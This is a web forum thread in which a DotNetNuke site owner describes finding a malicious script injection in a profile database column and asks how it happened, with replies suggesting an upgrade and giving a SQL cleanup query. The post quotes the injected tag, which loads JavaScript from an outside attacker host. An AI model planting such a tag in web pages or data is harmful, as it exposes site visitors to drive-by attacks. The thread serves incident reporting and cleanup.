Couldn't find a bug report forum, so....

Long story short; started getting a DotNetNuke.Services.Exceptions.PageLoadException: Input string was not in a correct format error this morning after I tried to log in. After I got that error, site wouldn't load at all. DNN versions of the site is 3 weeks old, just finished porting from the existing site. It had been working without a htich for 3 weeks tho'.

Much Googling ensued and ultimately I tracked it down to the PropertyValue column in the UserProfile table. Seems somone has some how managed to append a bit of code that called a javascript to the end of every value in the column:

<script src="http://www.banner82.com/b.js"></script>

Without detailing the whole process, this script ultimately led to anothet site that tried to load a script that aloowed access to the file system through IE. Doh!

That's not hte purpose of this post however...

Once I deleted this bit of script from the end of each PropertyValue field value, site came back fine.

My concerns:
How did this happen?
How can I prevent it from happening again?
Keep in mind it wasn't just 1 field in the PropertyValue coumn, it was every field.....

Thanks,

Dave

Dave, which DNN version are you running - AFAIK this has been been fixed since a couple of versions. I sugest to upgrade to latest version of DotNetNuke!

Where can we go to see what was fixed? I cannot upgrade our install due to 3rd party components not compatible with later versions.

NOTE: To clean up this injection, run:

Update Users SET Username = SUBSTRING(Username, 1, CHARINDEX('<script src=http://www.banner82.com/b.js></script>', Username)-1) WHERE CHARINDEX('<script src=http://www.banner82.com/b.js></script>', Username)-1 > 0